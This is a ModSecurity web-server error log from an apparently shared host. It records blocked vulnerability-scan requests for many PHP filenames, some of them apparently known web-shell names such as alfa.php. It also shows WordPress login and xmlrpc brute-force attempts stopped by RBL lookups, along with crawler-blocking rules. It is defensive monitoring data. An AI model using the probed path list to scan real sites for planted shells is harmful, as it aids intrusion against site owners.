[Tue May 26 18:21:11.339248 2026] [security2:error] [pid 983082:tid 983219] [client 23.100.97.57:10452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/10.php"] [unique_id "ahWXP7vhpIlZJOtze4tJUgAAAIw"]
[Tue May 26 18:21:11.889580 2026] [security2:error] [pid 983082:tid 983267] [client 23.100.97.57:4206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/13.php"] [unique_id "ahWXP7vhpIlZJOtze4tJXAAAALw"]
[Tue May 26 18:21:12.287890 2026] [security2:error] [pid 983082:tid 983292] [client 188.166.247.214:61693] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "koiralalogistics.com.onesoft.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWXQLvhpIlZJOtze4tJYwAAANU"]
[Tue May 26 18:21:12.422580 2026] [security2:error] [pid 983082:tid 983319] [client 23.100.97.57:12928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/100.php"] [unique_id "ahWXQLvhpIlZJOtze4tJZwAAAPA"]
[Tue May 26 18:21:12.997749 2026] [security2:error] [pid 983082:tid 983221] [client 23.100.97.57:3083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/222.php"] [unique_id "ahWXQLvhpIlZJOtze4tJdAAAAI4"]
[Tue May 26 18:21:13.419575 2026] [security2:error] [pid 983082:tid 983248] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXQLvhpIlZJOtze4tJZgAAAKk"]
[Tue May 26 18:21:13.565061 2026] [security2:error] [pid 983082:tid 983235] [client 23.100.97.57:1129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/adminfuns.php"] [unique_id "ahWXQbvhpIlZJOtze4tJfgAAAJw"]
[Tue May 26 18:21:14.094781 2026] [security2:error] [pid 983082:tid 983216] [client 23.100.97.57:11724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/abcd.php"] [unique_id "ahWXQrvhpIlZJOtze4tJhQAAAIk"]
[Tue May 26 18:21:14.665569 2026] [security2:error] [pid 983082:tid 983333] [client 23.100.97.57:9572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/al.php"] [unique_id "ahWXQrvhpIlZJOtze4tJjwAAAP4"]
[Tue May 26 18:21:15.250829 2026] [security2:error] [pid 983082:tid 983301] [client 23.100.97.57:4385] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/alfa.php"] [unique_id "ahWXQ7vhpIlZJOtze4tJmQAAAN4"]
[Tue May 26 18:21:15.702117 2026] [security2:error] [pid 983082:tid 983151] [remote 82.223.0.235:38638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.0.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXQ7vhpIlZJOtze4tJowAA4kQ"]
[Tue May 26 18:21:15.845638 2026] [security2:error] [pid 983082:tid 983334] [client 23.100.97.57:4203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/as.php"] [unique_id "ahWXQ7vhpIlZJOtze4tJpwAAAP8"]
[Tue May 26 18:21:16.181964 2026] [security2:error] [pid 983082:tid 983153] [remote 82.223.0.235:38638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.0.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXRLvhpIlZJOtze4tJrQAAuUY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:21:16.439183 2026] [security2:error] [pid 983082:tid 983322] [client 23.100.97.57:11267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/aa.php"] [unique_id "ahWXRLvhpIlZJOtze4tJrwAAAPM"]
[Tue May 26 18:21:17.007879 2026] [security2:error] [pid 983082:tid 983328] [client 23.100.97.57:10474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/abc.php"] [unique_id "ahWXRbvhpIlZJOtze4tJvQAAAPk"]
[Tue May 26 18:21:17.554973 2026] [security2:error] [pid 983082:tid 983257] [client 23.100.97.57:9472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/av.php"] [unique_id "ahWXRbvhpIlZJOtze4tJygAAALI"]
[Tue May 26 18:21:18.023543 2026] [security2:error] [pid 983082:tid 983281] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXQ7vhpIlZJOtze4tJogAAAMo"]
[Tue May 26 18:21:18.132777 2026] [security2:error] [pid 983082:tid 983254] [client 23.100.97.57:4635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/autoload_classmap.php"] [unique_id "ahWXRrvhpIlZJOtze4tJ3QAAAK8"]
[Tue May 26 18:21:18.165162 2026] [security2:error] [pid 983082:tid 983218] [client 173.252.70.113:62278] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXRrvhpIlZJOtze4tJ2wAAiyc"], referer: https://robuxgenerator2017.web.app/
[Tue May 26 18:21:18.251465 2026] [security2:error] [pid 983082:tid 983332] [client 69.171.234.7:48916] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXRrvhpIlZJOtze4tJ3wAA_X4"], referer: https://robuxgenerator2017.web.app/
[Tue May 26 18:21:18.365275 2026] [security2:error] [pid 983082:tid 983302] [client 69.171.234.24:64684] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXRrvhpIlZJOtze4tJ4gAA30k"], referer: https://robuxgenerator2017.web.app/
[Tue May 26 18:21:18.407862 2026] [security2:error] [pid 983082:tid 983303] [client 173.252.82.22:51254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXRrvhpIlZJOtze4tJ5QAA4FQ"], referer: https://robuxgenerator2017.web.app/
[Tue May 26 18:21:18.551087 2026] [security2:error] [pid 983082:tid 983231] [client 137.184.130.181:51655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 181.130.184.137.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "blog.jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahWXRrvhpIlZJOtze4tJ5AAAAJg"]
[Tue May 26 18:21:18.551208 2026] [security2:error] [pid 983082:tid 983231] [client 137.184.130.181:51655] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "blog.jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahWXRrvhpIlZJOtze4tJ5AAAAJg"]
[Tue May 26 18:21:18.676164 2026] [security2:error] [pid 983082:tid 983285] [client 23.100.97.57:4162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/asus.php"] [unique_id "ahWXRrvhpIlZJOtze4tJ6QAAAM4"]
[Tue May 26 18:21:19.081421 2026] [security2:error] [pid 983082:tid 983308] [client 69.63.184.35:41124] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXR7vhpIlZJOtze4tJ-gAA5QU"], referer: https://robuxgenerator2017.web.app/
[Tue May 26 18:21:19.122464 2026] [security2:error] [pid 983082:tid 983261] [client 69.171.234.24:64692] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXR7vhpIlZJOtze4tJ-wAAtgI"], referer: https://robuxgenerator2017.web.app/
[Tue May 26 18:21:19.235715 2026] [security2:error] [pid 983082:tid 983219] [client 23.100.97.57:1109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/about.php"] [unique_id "ahWXR7vhpIlZJOtze4tKAQAAAIw"]
[Tue May 26 18:21:19.271844 2026] [security2:error] [pid 983082:tid 983244] [client 173.252.69.20:36218] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXR7vhpIlZJOtze4tJ_wAApXs"], referer: https://robuxgenerator2017.web.app/
[Tue May 26 18:21:19.272362 2026] [security2:error] [pid 983082:tid 983300] [client 173.252.82.112:54732] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXR7vhpIlZJOtze4tKAAAA3Xw"], referer: https://robuxgenerator2017.web.app/
[Tue May 26 18:21:19.532245 2026] [security2:error] [pid 983082:tid 983263] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXRbvhpIlZJOtze4tJ0wAAALg"]
[Tue May 26 18:21:19.651188 2026] [security2:error] [pid 983082:tid 983245] [client 103.48.182.138:9817] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.182.48.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/xmlrpc.php"] [unique_id "ahWXR7vhpIlZJOtze4tKBgAAAKY"]
[Tue May 26 18:21:19.651367 2026] [security2:error] [pid 983082:tid 983245] [client 103.48.182.138:9817] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "rainadelproperties.com"] [uri "/xmlrpc.php"] [unique_id "ahWXR7vhpIlZJOtze4tKBgAAAKY"]
[Tue May 26 18:21:19.793929 2026] [security2:error] [pid 983082:tid 983264] [client 23.100.97.57:5648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/atomlib.php"] [unique_id "ahWXR7vhpIlZJOtze4tKCgAAALk"]
[Tue May 26 18:21:20.210850 2026] [security2:error] [pid 983082:tid 983210] [remote 114.119.149.254:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.stockmarketanalysis.in"] [uri "/index-option-tips.php"] [unique_id "ahWXSLvhpIlZJOtze4tKDQAAvn8"], referer: https://www.stockmarketanalysis.in/bullion-tips.php
[Tue May 26 18:21:20.393714 2026] [security2:error] [pid 983082:tid 983297] [client 23.100.97.57:11272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/alfa-rex.php7"] [unique_id "ahWXSLvhpIlZJOtze4tKFQAAANo"]
[Tue May 26 18:21:20.893447 2026] [security2:error] [pid 983082:tid 983208] [remote 66.116.199.98:47042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.199.116.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWXSLvhpIlZJOtze4tKHAAA_H0"]
[Tue May 26 18:21:20.949333 2026] [security2:error] [pid 983082:tid 983313] [client 23.100.97.57:6719] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/b.php"] [unique_id "ahWXSLvhpIlZJOtze4tKHQAAAOo"]
[Tue May 26 18:21:21.522686 2026] [security2:error] [pid 983082:tid 983333] [client 23.100.97.57:12933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/buy.php"] [unique_id "ahWXSbvhpIlZJOtze4tKKgAAAP4"]
[Tue May 26 18:21:21.572310 2026] [security2:error] [pid 983082:tid 983260] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXSLvhpIlZJOtze4tKFAAAALU"]
[Tue May 26 18:21:22.000255 2026] [security2:error] [pid 983082:tid 983132] [remote 66.116.199.98:47042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.199.116.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWXSbvhpIlZJOtze4tKMQAAjDE"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 18:21:22.128734 2026] [security2:error] [pid 983082:tid 983242] [client 23.100.97.57:13822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/bless.php"] [unique_id "ahWXSrvhpIlZJOtze4tKNQAAAKM"]
[Tue May 26 18:21:22.664948 2026] [security2:error] [pid 983082:tid 983235] [client 23.100.97.57:11733] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/class-t.api.php"] [unique_id "ahWXSrvhpIlZJOtze4tKPwAAAJw"]
[Tue May 26 18:21:22.958197 2026] [security2:error] [pid 983082:tid 983084] [remote 209.42.19.17:41756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWXSrvhpIlZJOtze4tKQwAAtwE"]
[Tue May 26 18:21:23.215345 2026] [security2:error] [pid 983082:tid 983339] [client 23.100.97.57:6678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/cache.php"] [unique_id "ahWXS7vhpIlZJOtze4tKUAAAAQQ"]
[Tue May 26 18:21:23.365168 2026] [security2:error] [pid 983082:tid 983296] [client 14.169.240.164:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXSbvhpIlZJOtze4tKMAAAANk"]
[Tue May 26 18:21:23.640668 2026] [security2:error] [pid 983082:tid 983174] [remote 54.37.118.70:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "ndequipments.com"] [uri "/robots.txt"] [unique_id "ahWXS7vhpIlZJOtze4tKUgAAhVs"]
[Tue May 26 18:21:23.640879 2026] [security2:error] [pid 983082:tid 983212] [client 54.37.118.70:0] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ndequipments.com"] [uri "/robots.txt"] [unique_id "ahWXS7vhpIlZJOtze4tKUgAAhVs"]
[Tue May 26 18:21:23.778444 2026] [security2:error] [pid 983082:tid 983289] [client 23.100.97.57:2597] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/content.php"] [unique_id "ahWXS7vhpIlZJOtze4tKVwAAANI"]
[Tue May 26 18:21:24.321741 2026] [security2:error] [pid 983082:tid 983279] [client 23.100.97.57:12940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/classwithtostring.php"] [unique_id "ahWXTLvhpIlZJOtze4tKXgAAAMg"]
[Tue May 26 18:21:24.528839 2026] [security2:error] [pid 983082:tid 983231] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXSrvhpIlZJOtze4tKSQAAAJg"]
[Tue May 26 18:21:24.870043 2026] [security2:error] [pid 983082:tid 983238] [client 23.100.97.57:9334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/css.php"] [unique_id "ahWXTLvhpIlZJOtze4tKaAAAAJ8"]
[Tue May 26 18:21:25.073454 2026] [security2:error] [pid 983082:tid 983187] [remote 142.44.225.45:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "ndequipments.com"] [uri "/"] [unique_id "ahWXTbvhpIlZJOtze4tKbwAAl2g"]
[Tue May 26 18:21:25.073690 2026] [security2:error] [pid 983082:tid 983230] [client 142.44.225.45:0] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ndequipments.com"] [uri "/"] [unique_id "ahWXTbvhpIlZJOtze4tKbwAAl2g"]
[Tue May 26 18:21:25.422772 2026] [security2:error] [pid 983082:tid 983336] [client 23.100.97.57:5666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/chosen.php"] [unique_id "ahWXTbvhpIlZJOtze4tKewAAAQE"]
[Tue May 26 18:21:26.007041 2026] [security2:error] [pid 983082:tid 983338] [client 23.100.97.57:1966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/doc.php"] [unique_id "ahWXTrvhpIlZJOtze4tKiQAAAQM"]
[Tue May 26 18:21:26.504507 2026] [security2:error] [pid 983082:tid 983280] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXTbvhpIlZJOtze4tKcgAAAMk"]
[Tue May 26 18:21:26.597714 2026] [security2:error] [pid 983082:tid 983284] [client 23.100.97.57:11727] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/elp.php"] [unique_id "ahWXTrvhpIlZJOtze4tKlwAAAM0"]
[Tue May 26 18:21:27.154905 2026] [security2:error] [pid 983082:tid 983245] [client 23.100.97.57:9296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/Exception-class.php"] [unique_id "ahWXT7vhpIlZJOtze4tKngAAAKY"]
[Tue May 26 18:21:27.754961 2026] [security2:error] [pid 983082:tid 983265] [client 23.100.97.57:9337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/ee.php"] [unique_id "ahWXT7vhpIlZJOtze4tKpQAAALo"]
